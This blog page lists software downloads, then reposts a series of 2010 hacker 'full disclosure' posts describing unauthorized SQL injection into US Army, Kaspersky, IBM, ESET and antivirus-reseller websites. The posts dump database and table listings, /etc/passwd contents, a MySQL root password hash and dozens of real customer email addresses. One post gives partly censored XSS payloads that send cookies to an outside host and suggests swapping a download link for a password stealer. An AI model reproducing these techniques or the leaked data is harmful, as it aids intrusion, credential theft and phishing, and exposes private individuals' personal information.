Wednesday, February 1, 2012

Hash Codes

Download HashCodes_x86.exe
Download HashCodes_x64.exe
Download HashCodesSetup.exe

Program can hash data from keyboard, file or CD/DVD by Adler32, CRC32, CRC64, GOST, HAVAL, MD2, MD4, MD5, MD6, SHA-0, SHA-1, SHA-1-IME, SHA-224, SHA-256, SHA-384, SHA-512, RIPEMD-128, RIPEMD-160, RIPEMD-256, RIPEMD-320, TIGER or Whirlpool algorithm.


Features

  • Hash data from keyboard, file or CD/DVD
  • Uses Adler32, CRC32, CRC64, GOST, HAVAL, MD2, MD4, MD5, MD6, SHA-0, SHA-1, SHA-1-IME, SHA-224, SHA-256, SHA-384, SHA-512, RIPEMD-128, RIPEMD-160, RIPEMD-256, RIPEMD-320, TIGER and Whirlpool algorithm
  • Copy hash codes to the clipboard or save to the disk
  • Can compare hash codes
  • Load saved hash code file to comparison
  • The progress bar show the current process
  • Suspend, resume or stop the hash process
  • Save the log information
  • Display the hashing time
  • Version on 32-bit and 64-bit Windows system
  • Can be used as standalone software
  • Multilingual user interface (Chinese (Simplified), Chinese (Traditional), English, German, Italian, Polish, Slovenian, Spanish)
  • Drag & Drop support

WinMerge

Download WinMerge-2.12.4-Setup.exe
Download WinMerge-2.12.4-exe.7z
Download WinMerge-2.12.4-exe.zip

Download WinMerge 7-zip-plugin
Merge7zInstaller0028-465-920.exe

What is WinMerge?

WinMerge is an Open Source differencing and merging tool for Windows. WinMerge can compare both  folders and files, presenting differences in a visual text format that is easy to understand and handle.
WinMerge is highly useful for determining what has changed between project versions, and then merging changes between versions. WinMerge can be used as an external differencing/merging tool or as a standalone application.


Features
In addition, WinMerge has many helpful supporting features that make comparing, synchronising, and merging as easy and useful as possible:

General 
■Supports Microsoft Windows 98/ME/2000/XP/2003/Vista/2008
■Handles Windows, Unix and Mac text file formats
■Unicode support
■Tabbed interface
File Compare
■Visual differencing and merging of text files
■Flexible editor with syntax highlighting, line numbers and word-wrap
■Highlights differences inside lines
■Difference pane shows current difference in two vertical panes
■Location pane shows map of files compared
■Moved lines detection
Folder Compare 
■Regular Expression based file filters allow excluding and including items
■Fast compare using file sizes and dates
■Compares one folder or includes all subfolders
■Can show folder compare results in a tree-style view
Version Control 
■Creates patch files (Normal-, Context- and Unified formats)
■Resolve conflict files
■Rudimentary Visual SourceSafe and Rational ClearCase integration
Other 
■Shell Integration (supports 64-bit Windows versions)
■Archive file support using 7-Zip
■Plugin support
■Localizable interface
■Online manual and installed HTML Help manual



TinKode-MySQL.com and Sun/Oracle Haked



TinKode-hacks into NASA servers



NOTE:
Until now, no. I don't do bad things. I only find and make public the info. Afterwards I send an email to them to fix the holes. It's like an security audit, but for free.

TinKode-Royalnavy.mod.uk Haked Image



Unfortunately the Royal Navy website is currently undergoing essential maintenance. Please visit again soon

TinKode-US Army full disclosure again


US Army full disclosure again

Posted by isrtinkode on February 19, 2010

                                /\                                    (_) |
                               /  \   _ __ _ __ ___  _   _   _ __ ___  _| |
                              / /\ \ | '__| '_ ` _ \| | | | | '_ ` _ \| | |
                             / ____ \| |  | | | | | | |_| |_| | | | | | | |
                            /_/    \_\_|  |_| |_| |_|\__, (_)_| |_| |_|_|_|
                                                      __/ |
                                                     |___/
The United States Army is the branch of the United States Military responsible for land-based military operations. It is the largest and oldest established branch of the U.S. military and is one of seven uniformed services. The modern Army has its roots in the Continental Army which was formed on 14 June 1775, before the establishment of the United States, to meet the demands of the American Revolutionary War. Congress created the United States Army on 14 June 1784 after the end of the war to replace the disbanded Continental Army. The Army considers itself to be descended from the Continental Army and thus dates its inception from the origins of that force.
Vulnerable link: http://onestop.army.mil
This website is vulnerable to MSSQL Injection. With this vulnerability i can see / extract all things from databases.
Testing:




Ok, in this picture we can see all main informations about webserver.

Main information:
#Version: Microsoft SQL Server 2000 - 8.00.2282 (Intel X86) Dec 30 2008 02:22:41 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2
#censored
#censored
#censored
All databases:
[0] censored
[1] master
[2] tempdb
[3] model
[4] msdb
[5] AHOS
[6] AHIT_WEB
[7] AHOS_HQD
[8] AHOS_WL
[9] HEAT
[10] REF_DB
[11] ReportDB
[12] USAREUR_TEST
[13] YARDI_CONV
[14] HOMES_IFS
[15] HOMES_CDB_USAREUR
[16] HOMES_WHSE
[17] HUACFSDIS102148
[18] PINEA4CASTLE
[19] HOMES_CDB
[20] GFOQ_Development
[21] ARTI02036THS003
[22] BISM5843235S301
[23] CDAR0413DPWS001
[24] CHAB000639BS002
[25] FRSA1050WHDS212
[26] GGDE0032284S005
[27] GRAF0244HOUS001
[28] HDCS3980WHDS204
[29] Spotlight
[30] LEDW0003SWFS002
[31] LEDW0252GSWS003
[32] NHQA4106WDAS101
[33] PANS2913GSTS001
[34] PION0011414S601
[35] SEMI0022DPWS002
[36] SULL0255WMAS001
[37] VCAM0107HOUS001
[38] WARN7114279S003
[39] WETZ8876222S210
[40] WIAF1023221S001
[41] LEDW0252GSWS001
[42] BUCHAHOMES01
[43] CASEA4KORHOU068
[44] GREE305APDPW001
[45] HNRYA4KOA4HG086
[46] HUMPA1KODPWH014
[47] RICH123A0PHO001
[48] SCHOU01A4DPWHMS
[49] TORIDPWA4177105
[50] WAIN224DB003153
[51] YONGA4KODPHD995
[52] ZAMADPWA0067011
[53] ANADA1HOMES
[54] APGRA0GAG-HOMES
[55] BENNA0I32214251
[56] BLISSVDPW1HS001
[57] BRAGA4PWAJ18145
[58] CARSDPWXAPS0002
[59] DAEN3104WKLS005
[60] DAMIAP06
[61] DIXXAPRDPW00001
[62] DRUMA001VA11202
[63] DUGWITA4HOMES
[64] EUSTDB13HOMES01
[65] FS-HOMES01
[66] FTBELVOIR_S001
[67] GAHSGHOMES
[68] GORDDBRCP001
[69] HAMIA1206DPW008
[70] HAWTA0HOMES
[71] HIALA0KOA4HG170
[72] HOODA0DPWSYS003
[73] IRWIIMA0HOMES3
[74] JACKDLEHOMES
[75] KNOXDBOSNT2
[76] KS-HSG-HOMES
We can access information_schema, so let’s see the tables from principal database “censored

[0] comd_list
[1] dtproperties
[2] Faqs
[3] Faqs_Categories
[4] Forms
[5] forms_base
[6] gBase
[7] gBase_OLD
[8] gCountries
[9] gHousing_offices
[10] gHousing_offices-old
[11] gStates
[12] Housing_off_post
[13] Housing_phone_qr
[14] mgr_login
[15] mgr_login_OLD
[16] mgr_login_passwords
[17] mgr_login_save
[18] MgrCorner_Configuration
[19] MgrCorner_Configuration_ID
[20] must_know
[21] must_know_cat
[22] Must_know_OLD
[23] sysconstraints
[24] syssegments
[25] UPH
[26] UPH_OLD
[27] uph_photo_text
[28] uph_photo_tours
[29] uph_photos
[30] v_mapview
[31] V_RankView
[32] vHousingAreas
[33] vhqd_vrtours
[34] VIEW_housing
[35] VIEW_phototours
[36] VIEW_vrtours
[37] vMapFiles
[38] vMapOrder
[39] vPhotoFiles
[40] vPlan
[41] vPlanFiles
[42] vRank
[43] vRankDesc
[44] vRankRankDesc
[45] waitlist
[46] waitlist_items
Now, here are some interesting tables, like censored.

Here i found censored columns, with :
#censored
#censored
wtf! :|
That it’s all! Bye, TinKode…

TinKode-Kaspersky Portugal Full Disclosure


Kaspersky Portugal Full Disclosure

Posted by isrtinkode on February 19, 2010
                     _   __                              _
                    | | / /                             | |
                    | |/ /  __ _ ___ _ __   ___ _ __ ___| | ___   _
                    |    \ / _` / __| '_ \ / _ \ '__/ __| |/ / | | |
                    | |\  \ (_| \__ \ |_) |  __/ |  \__ \   <| |_| |
                    \_| \_/\__,_|___/ .__/ \___|_|  |___/_|\_\\__, |
                                    | |                        __/ |
                                    |_|                       |___/

                                                                                  #owned by c0de.breaker

In one evening, when i searched a antivirus, I entered on the official kaspersky website of Portugal from mistake.
Link: www.kaspersky.com.pt
Kaspersky, from what i know has been hacked by “unu” with MySQLi.
So I said to try to see if I could find a vulnerability!
After 5 minutes of searching, I found something interesting, namely::

Warning: censored() [function.censored]: Query failed: ERROR: syntax error at or near "\" at character 306 in /home1/_sites/wwwkasperskycompt/kaspersky/PHP/IfDBRevendedoresKaspersky.phpclass on line 121
ERRO na execucao da query getRevendedors
ERROR: syntax error at or near "\" at character 306
censored() : That means as he use a censoredSQL database.
First time, i checked to see if is injectable, and if i can extract something.
The answer:

———————————————————–

True


False
———————————————————–

So I can make censoredSQL Injection!
What I extracted?
I wasn’t concerned about the content, I only “got” the names of databases, tables and columns.

Versiunea

#Principal Database: censored
#User: censored
#Version: censoredSQL 8.1.11 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)
#Other Databases
1 censored
2 template1
3 template0
4 monitoring
5 estkaspersky
6 horde
7 licence
8 hardwareipbrick
9 acessosclientes
10 licencefmota
11 temp
12 dbdoc
13 webcalendar
14 ipbox
15 adcav
16 jpleitao2
17 funambol
18 gaia
19 cinel2
20 makeupdate
21 tempdefaultconfig
#The tables from censored database (number:458)
1 table_base_idxml73
2 table_ass_idxml73_idtab1025
3 liga_tipoent_categoria
4 liga_subcat_categoria
5 classif_entidades
6 ignora
7 categoria_entidade
8 site
9 subcategoria_entidade
10 tabela_gestao_ipcontactos
11 ipcontactos_lang_files
12 utilizador_externo
13 webcal_sincro
14 pga_queries
15 pga_forms
16 pga_scripts
17 pga_reports
18 pga_schema
19 pga_layout
20 avaliar
21 estadorec1
22 liga_resultado_tarefa
23 webcal_user
24 utilizadores_operacao
25 webcal_entry
26 webcal_entry_repeats
27 webcal_entry_repeats_not
28 webcal_entry_user
29 webcal_entry_ext_user
30 webcal_user_pref
31 webcal_user_layers
32 exhumationprice
33 webcal_site_extras
34 webcal_reminder_log
35 webcal_group
36 table_base_idxml13
37 webcal_group_user
38 webcal_view
39 webcal_view_user
40 gravetype
41 webcal_entry_log
42 webcal_categories
43 webcal_config
44 cemeterysection
45 solucao
46 ipdoclanguages
47 ipdoctranslation
48 ipdocsentences
49 ipdocpages
50 ipdocpagetranslation
51 table_base_idxml15
52 table_ass_idxml15_idtab51
53 lockcodigos
54 assunto
55 table_base_idxml16
56 subassunto
57 table_ass_idxml16_idtab68
58 entidades2
59 coordenadas_estado
60 dados_infantarios
61 coordenadas_estadopr
62 codigo_accaopr
63 table_base_idxml17
64 raca
65 table_base_idxml18
66 table_base_idxml19
67 table_base_idxml20
68 table_base_idxml14
69 distrito
70 concelho
...
439 accaopr
440 table_base_idxml79
441 estadopr
442 funcaoproc
443 funcaopr
444 table_ass_idxml79_idtab1183
445 table_ass_idxml79_idtab1190
446 table_ass_idxml79_idtab1191
447 table_ass_idxml79_idtab1192
448 table_ass_idxml79_idtab1193
449 table_ass_idxml77_idtab1194
450 table_base_idxml78
451 table_ass_idxml80_idtab1216
452 table_base_idxml81
453 table_ass_idxml81_idtab1228
454 table_base_idxml70
455 table_base_idxml82
456 documento
457 revisaodoc
458 table_ass_idxml82_idtab1257
#Me: Ma gandesc, daca tot este una din cele mai mari compani din lume care asigura protectia poate a multor milioane de utilizatori prin produsele sale,
de ce nu au grija de propria securitatea in primul rand? Acest lucru poate fi si din cauza firmelor care creaza aceste website-uri intr-un timp foarte scurt pe sume exagerat de mari…
Cam atat.

~Where is a will, there is a way

TinKode-Kaspersky Thailand Full Access


Kaspersky Thailand Full Access

Posted by isrtinkode on February 19, 2010
 _  __                             _                                _
| |/ /                            | |              /\              (_)
| ' / __ _ ___ _ __   ___ _ __ ___| | ___   _     /  \   __ _  __ _ _ _ __
|  < / _` / __| '_ \ / _ \ '__/ __| |/ / | | |   / /\ \ / _` |/ _` | | '_ \
| . \ (_| \__ \ |_) |  __/ |  \__ \   <| |_| |  / ____ \ (_| | (_| | | | | |
|_|\_\__,_|___/ .__/ \___|_|  |___/_|\_\\__, | /_/    \_\__, |\__,_|_|_| |_|
              | |                        __/ |           __/ |
              |_|                       |___/           |___/

                     #Kaspersky Thailand full access@c0de.breaker
Ok… As you might remember, some time ago, I gained access into Kaspersky Portugal.
Now I found another vulnerable parameter in Kaspersky Thailand.
Because the mod_security was ON, it was hard for me to make the injection, and in order to extract tables,colums,etc you must have a vast knowledge about how to filter some things.
Testing:






Main Informations:

#Version: 5.1.30
#censored
#censored
#censored
All databases:
#information_schema
#censored
#censored
Tables from thaikasp_dealer:

#censored
#newheader
#tb_dealer
#tb_part
Tables from thaikasp_forum:
#forum
#tbmember
Columns from tbmember
#ID
#Username
#Password
And now all accounts from tbmember. I can’t understand why passwords aren’t encrypted!

#censored
#censored
#censored
#censored
Admin Control Panel:


Yeah, finish.
Bye, TinKode

TinKode-Orange Vulnerable to XSS and phishing


Orange Vulnerable to XSS and phishing

Posted by isrtinkode on February 19, 2010
                       ____                               _    _ _  __
                      / __ \                             | |  | | |/ /
                     | |  | |_ __ __ _ _ __   __ _  ___  | |  | | ' /
                     | |  | | '__/ _` | '_ \ / _` |/ _ \ | |  | |  <
                     | |__| | | | (_| | | | | (_| |  __/ | |__| | . \
                      \____/|_|  \__,_|_| |_|\__, |\___|  \____/|_|\_\
                                              __/ |
                                             |___/
                                            # TinKode & La Magra@ Romania
XSS – [Cross-Site Scripting]
Informations:
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which enable malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy…
More here: [ XSS ]
I just found a XSS vulnerability in website.orange.co.uk website.
Through this vulnerability, an attacker could inject HTML or JavaScript code which may lead to cookie stealing.
Proof of Concept:

Link:
http://censored/index.php?module=censored=">censored  src=javascript:censored="http://censored?censored="+document.censored+"&censored")></censored>
c0de:
"><censored" src=javascript:censored="http://censored.site.com/censored.php?censored="+document.censored>
We can encode the malicous code in base64, hex, etc in order to hide our intentions! :)
Another example for this vulnerability is phishing! :D
As everyone knows, there are programs called stealer which can steal all saved passwords from your browser.
I picked a executable program (winamp in our case) for a demonstration.
Link to download winamp: http://download.nullsoft.com/winamp/client/winamp5572_lite_en-us.exe
The malicious code:
"><censored  src="http://download.nullsoft.com/winamp/client/winamp5572_lite_en-us.exe">censored
Encoded in hex will become:

http://website.orange.co.uk/censored
Replace the winamp link with another one(eg: a stealer) and you can trick a lot of people.
Note: This isn’t the only vulnerability which I found in : orange.co.uk
#Tinkode

TinKode-Avast,Avira,Nero Full Disclosure Accounts Exposed


Avast,Avira,Nero Full Disclosure Accounts Exposed

Posted by isrtinkode on February 28, 2010
                       _                  _             _   _
    /\                | |       /\       (_)           | \ | |
   /  \__   ____ _ ___| |_     /  \__   ___ _ __ __ _  |  \| | ___ _ __ ___
  / /\ \ \ / / _` / __| __|   / /\ \ \ / / | '__/ _` | | . ` |/ _ \ '__/ _ \
 / ____ \ V / (_| \__ \ |_ _ / ____ \ V /| | | | (_| |_| |\  |  __/ | | (_) |
/_/    \_\_/ \__,_|___/\__( )_/    \_\_/ |_|_|  \__,_( )_| \_|\___|_|  \___/
                          |/                         |/
                                     #TinKode & Jackhax0r @ Full Disclosure
Informations:
Company Miam-Veri d.o.o is a representative of avast! products for the Republic of Croatia.
Miam-Veri d.o.o. is reseller for Avast! Antivirus, GFI Software, Adobe and Nero VLP.
Avira Antivirus
Avast! – Computer virus, worm and Trojan protection
GFI – Fax server, Exchange and network software
Adobe – Print, design and publishing software
Nero VLP – All-In-One Digital Media Solutions
Vulnerable links:
Avast: http://www.avast.software.hr/detalji.asp?ID=9
GFI: http://gfi.software.hr/detalji.asp?ID=7
Nero: http://nero.software.hr/detalji.asp?ID=67
Avira: http://avira.software.hr/detalji.asp?ID=6
Testing:



Main Informations:
[*]Version = Microsoft SQL Server 2005 – 9.00.4053.00 (Intel X86) May 26 2009 14:24:20 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
[*]Current User = censored
[*]Current Database = censored
[*]Server = Microsoft-IIS/6.0
Screen:
All Databases (46):
censored
master
tempdb
model
msdb
ASPNETDB
dnn_zupa
GalaTest
hram-zdravlja-dnn
codeit
tiashop
radio_ivanec_hr_dnn
gipsmont-cosic
drvodjelac_hr_dnn
hps_hr_dnn
moto_gume_com_vs
kridom2
kridomhr
EMOS_ZG
Nekretnine
nnmkor
oglasnik
emitri_hr_emitri
24sata2
novi-informatorProduction
rideatrain
mdosobnidnevnik
CY_2008
CYRacuni
testMISO3
croatia_rab_net_katalog
dracomerx_hr_CompanyWeb
mojkompjuter_com_mojkompjuter
lglas
motoklub_cms
POSLOVNIPROSTOR
vs-baterije
rituals
FRIGOTEHNIKA
knjiga
shop_manitabo_com_vs
bednja_hr_baza
9A4DK_com_dnn
TicketTool
split_itportal_com_CompanyWeb
vs-marjan-tisak
Tables from main database “censored“:
DJELATNOSTI
FINTAB
Komentar
KomentarPoslovanja
KontrolaNaloga
KontrolaNalogaPojedinac
KontrolaNalogaTemp
Limiti
LOG
OBRASCI
OBVEZNIK
OPCI1
OPCI2
OPERATERI
POGRESKE
Pokazatelji
PonudeHyperion2
PonudeH
TA
TAB_ZAG
TABBC101
TABBC102
TABBC103
TABDE101
TABDE102
TABDE103
TABLICE
ZAGLAV
TFI-POD
vVrijednosnica
vVrijednosnicaTFI
AvastAdmin
AvastTecaj
AvastTempNar
AvastKategorije
AvastNarproizvod
AvastNarudzbe
AvastNaslovna
AvastProgrami
KontniPlan
Racuni
RacuniDet
Ponude
PonudeDet
AviraKategorije
AviraPopis
AvastPopis
AvastProizvodi
AviraProizvodi
AvastIsplata
NeroKategorije
NeroProizvodi
AvastKorisnici
Kupci
AvastKupci
Columns from table “censored“:
Username: censored
Password:censored

OMG! WTF IS THAT? O_o
Accounts from “censored“:
Username : Password : Email
censoredcensored–avast@software.hr
censoredcensored–info@infoplanet.hr
censoredcensored–eksa-bit@ri.t-com.hrcensored–censored–brkaric@gmail.com
censoredcensored–kontakt@aero-racunala.hr
censoredcensored–info@diskont24.com
censoredcensored–damir@node.hr
censoredcensored–info@najkomp.hr
censoredcensored–servis@ultimus.hr; shop@ultimu
censoredcensored–amisa@amisa.hr
censoredcensored–info@vobis.hr
censoredcensored–partner.avast@signon.hr
censoredcensored–fran.baca@knjigice.com
censoredcensored–info@chloris-informatika.hr
censoredcensored–olicomp@optinet.hr
censoredcensored–instar@instar-informatika.hr
censoredcensored–magazinrs@magazinrs.hr
censoredcensored–kreso@cio.hr
censoredcensored–edrazenovic@gmail.com
censoredcensored–alen@besoft.hr
censoredcensored–mprahin@gmail.com
censoredcensored–1990ivan.maric@gmail.com
censoredcensored–tspinjac@gmail.com
censoredcensored–optima@optima-zadar.hr
censoredcensored–hturcin@hotmail.com
censoredcensored–danko@adm.hr
censoredcensored–mpasicko@gmail.com
censoredcensored–faithfry@gmail.com
censoredcensored–sasa.jovanovic@inet.hr
censoredcensored–prut@email.com
censoredcensored–dsajcic@gmail.com
censoredcensored–marko.pecatnik@gmail.com
censoredcensored–dominik.dusak@gmail.com
censoredcensored–valter.stemberga2@gmail.com
censoredcensored–slavica.zubak@hotmail.com
censoredcensored–hrvoje.humski@gmail.com
censoredcensored–antonio@software.hr
censoredcensored–info@studio-slatina.hr
censoredcensored–damir.hlaj@ka.t-com.hr
censoredcensored–frediienator@gmail.com
censoredcensored–bojan.podnar@gmail.com
censoredcensored–igorkolar25@gmail.com
censoredcensored–zlajamaxi@gmail.com
censoredcensored–grimir69@net.hr
censoredcensored–npavic_82@yahoo.com
censoredcensored–albukvic@gmail.com
censoredcensored–dlistes@gmail.com
censoredcensored–stzizic@gmail.com
censoredcensored–samuel.koprivnjak@gmail.com
censoredcensored–marin.farkas@gmail.com
censoredcensored–tomislav.parcina@gmail.com
censoredcensored–vklen@net.hr
censoredcensored–dlonjak@ffos.hr
censoredcensored–osjecko2@gmail.com
censoredcensored–miro.sertic@email.t-com.hr
censoredcensored–milolozaantonio@yahoo.com
censoredcensored–jogalic@gmail.com
censoredcensored–robimlinar@gmail.com
censoredcensored–josip.crnicki@gmail.com
censoredcensored–antisa1@optinet.hr
censoredcensored–braneweb@gmail.com
censoredcensored–ninovukic@gmail.com
censoredcensored–e.one@post.t-com.hr
censoredcensored–fran.jadrijev@hotmail.com
censoredcensored–houseboki@gmail.com
censoredcensored–som@somware.hr
censoredcensored–info@studio-bonet.com
censoredcensored–skydiver.extreme@gmail.com
censoredcensored–nik238@net.hr
censoredcensored–odiriuss@gmail.com
censoredcensored–mario44@net.hr
censoredcensored–marina.velat@gmail.com
censoredcensored–nikolavlacic@gmail.com
censoredcensored–eomersblood@gmail.com
censoredcensored–doris.fiume@gmail.com
censoredcensored–vjeran555@yahoo.com
censoredcensored–dumbovic@gmail.com
censoredcensored–shogo.cro@gmail.com
censoredcensored–vanja.rain@hi.t-com.hr
censoredcensored–mladen.basic@email.t-com.hr
censoredcensored–lahor.enc@sk.htnet.hr
censoredcensored–mate.barbaric@gmail.com
censoredcensored–mestrovic.ma@gmail.com
censoredcensored–Z.HRVOIC@vip.hr
censoredcensored–binogrupa@bino.hr
censoredcensored–info@pixma-itshop.com
censoredcensored–vekkica@hotmail.com
censoredcensored–goran.nxn@gmail.com
censoredcensored–castoos@gmail.com
censoredcensored–brkcomp@brkcomp.hr
censoredcensored–ivanvalentic81@gmail.com
censoredcensored–ivan.cajkovac@gmail.com
censoredcensored–binder.jo@gmail.com
[LOL]
So, all official reprezentative websites of Avast, Avira, Nero, GFI created by Miam-Veri D.O.O are vulnerable!
Great!
~TinKode
~Never forgot the power of silence! :)

TinKode-IBM Full Disclosure SQL Injection


IBM Full Disclosure SQL Injection

Posted by isrtinkode on March 4, 2010
#TinKode & skpx & begood
About IBM:
International Business Machines (NYSE: IBM), abbreviated IBM, is a multinational computer, technology and IT consulting corporation headquartered in Armonk, North Castle, New York, United States. The company is one of the few information technology companies with a continuous history dating back to the 19th century. IBM manufactures and sells computer hardware and software (with a focus on the latter), and offers infrastructure services, hosting services, and consulting services in areas ranging from mainframe computers to nanotechnology.
IBM has been well known through most of its recent history as the world's largest computer company and systems integrator. With over 407,000 employees worldwide, IBM is the largest and most profitable information technology and services employer in the world according to the Forbes 2000 list with sales of greater than 100 billion US dollars. IBM holds more patents than any other U.S. based technology company and has eight research laboratories worldwide. The company has scientists, engineers, consultants, and sales professionals in over 200 countries.
Vulnerable website:www.researcher.ibm.com

Version: 5.0.67
User: censored
Database: researcher_development
Datadir: /Applications/ censored /var/mysql/

All databases:
information_schema
bluebase
cdcol
mysql
researcher_development
test

Tables from main database “researcher_development“:
group_types
groups
locations
navbar_entries
publication_authors
publications
redirects
research_areas
researcher_group_entries
researcher_navbar_entries
researchers
Tables from “bluebase” database:
activity
auth_group
auth_group_permissions
auth_message
auth_permission
auth_user
auth_user_groups
auth_user_user_permissions
bluecomments_bluecomment
bluecomments_bluekarmascore
bluecomments_bluemoderatordeletion
bluecomments_blueuserflag
comments_comment
comments_freecomment
comments_karmascore
comments_moderatordeletion
comments_userflag
django_admin_log
django_content_type
django_session
django_site
projects_appacademy08
projects_application
projects_application_members
projects_application_moderators
projects_application_restrict
projects_appspeaker
projects_changelog
projects_document
projects_notespubdb
projects_patent
projects_patent_authors
projects_person
projects_pic
projects_pic_chairs
projects_project
projects_project_application
projects_project_contacts
projects_project_docs
projects_project_linemanagers
projects_project_members
projects_project_pics
projects_project_reviewers
projects_project_tags
projects_publication
projects_publication_authors
projects_pubstat
projects_restriction
projects_restriction_access_list
projects_tag
projects_useractivity
tag
tagged_item
votes
Accounts from “auth_user” table:
censored: sha1 censored  | hash cracked:  censored 
censored: sha1 censored   | hash cracked: censored

The account from “mysql.user“:
root : *F9F9C3D7DD04044668ABBFA629CE289E02F7A918 | hash cracked: 
censored

Here we can see the “ censored “:
# User Database
#
# Note that this file is consulted directly only when the system is running
# in single-user mode. At other times this information is provided by
# Open Directory.
#
# This file will not be consulted for authentication unless the BSD local node
# is enabled via /Applications/Utilities/Directory Utility.app
#
# See the DirectoryService(8) man page for additional information about
# Open Directory.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico
_lp:*:26:26:Printing Services:/var/spool/cups:/usr/bin/false
_postfix:*:27:27:Postfix Mail Server:/var/spool/postfix:/usr/bin/false
_mcxalr:*:54:54:MCX AppLaunch:/var/empty:/usr/bin/false
_pcastagent:*:55:55:Podcast Producer Agent:/var/pcast/agent:/usr/bin/false
_pcastserver:*:56:56:Podcast Producer Server:/var/pcast/server:/usr/bin/false
_serialnumberd:*:58:58:Serial Number Daemon:/var/empty:/usr/bin/false
_devdocs:*:59:59:Developer Documentation:/var/empty:/usr/bin/false
_sandbox:*:60:60:Seatbelt:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_ard:*:67:67:Apple Remote Desktop:/var/empty:/usr/bin/false
_www:*:70:70:World Wide Web Server:/Library/WebServer:/usr/bin/false
_eppc:*:71:71:Apple Events User:/var/empty:/usr/bin/false
_cvs:*:72:72:CVS Server:/var/empty:/usr/bin/false
_svn:*:73:73:SVN Server:/var/empty:/usr/bin/false
_mysql:*:74:74:MySQL Server:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_qtss:*:76:76:QuickTime Streaming Server:/var/empty:/usr/bin/false
_cyrus:*:77:6:Cyrus Administrator:/var/imap:/usr/bin/false
_mailman:*:78:78:Mailman List Server:/var/empty:/usr/bin/false
_appserver:*:79:79:Application Server:/var/empty:/usr/bin/false
_clamav:*:82:82:ClamAV Daemon:/var/virusmails:/usr/bin/false
_amavisd:*:83:83:AMaViS Daemon:/var/virusmails:/usr/bin/false
_jabber:*:84:84:Jabber XMPP Server:/var/empty:/usr/bin/false
_xgridcontroller:*:85:85:Xgrid Controller:/var/xgrid/controller:/usr/bin/false
_xgridagent:*:86:86:Xgrid Agent:/var/xgrid/agent:/usr/bin/false
_appowner:*:87:87:Application Owner:/var/empty:/usr/bin/false
_windowserver:*:88:88:WindowServer:/var/empty:/usr/bin/false
_spotlight:*:89:89:Spotlight:/var/empty:/usr/bin/false
_tokend:*:91:91:Token Daemon:/var/empty:/usr/bin/false
_securityagent:*:92:92:SecurityAgent:/var/empty:/usr/bin/false
_calendar:*:93:93:Calendar:/var/empty:/usr/bin/false
_teamsserver:*:94:94:TeamsServer:/var/teamsserver:/usr/bin/false
_update_sharing:*:95:-2:Update Sharing:/var/empty:/usr/bin/false
_installer:*:96:-2:Installer:/var/empty:/usr/bin/false
_atsserver:*:97:97:ATS Server:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false
That it’s all! :)
@TinKode

TinKode-ESET NOD32 Hong Kong Hacked


ESET NOD32 Hong Kong Hacked

Posted by isrtinkode on March 21, 2010
#NOD32 Hong Kong@ VMw4r3 & TinKode
Screenshot:

#cat /etc/passwd
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
v2admin:x:500:500::/home/v2admin:/bin/bash
nod32:x:501:501::/var/www/html:/bin/bash
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
distcache:x:94:94:Distcache:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
uploadfile:x:501:501::/var/www/html/UpFile:/bin/bash
NOD32 URL: http://www.eset.hk/templates_c/
Zone-h URL: http://zone-h.org/mirror/id/10409367
Simple but powerfull!
* We have not changed anything
Thanks!

TinKode-ESET NOD32 Taiwan Full Disclosure


ESET NOD32 Taiwan Full Disclosure

Posted by isrtinkode on March 22, 2010
#NOD32 Taiwan@ TinKode - Romania
About ESET:
ESET is an IT security company headquartered in Bratislava, Slovakia that was founded in 1992 by the merger of two private companies. The company is privately held and has branch offices in San Diego, California; Wexford, Ireland; London, United Kingdom; Buenos Aires, Argentina; Prague, Czech Republic and Kraków, Poland.
Vulnerable website: www.eset.com.tw to MySQL Injection.

Main Informations:
  • Version : 5.0.45
  • Database: nod32twnew
  • Datadir : /var/lib/mysql/
  • User    : censored

Databases:
  • information_schema
  • mysql
  • nod32twnew

Tables from main database:
  • article
  • category
  • enterprise_apply
  • estore_product
  • estore_product_20100106
  • estore_product_category
  • estore_product_category_20100106
  • estore_product_copy
  • faq_category
  • faq_category_detail
  • game3
  • manager
  • nodtwflash1
  • register
  • regkeyreplace
  • trial30
  • updates
We have permission to access mysql.user accounts:

MySQL.user account:
  • censored  :  censored
Accounts from manager table:
  • admin    :  censored
  • editor   :  censored
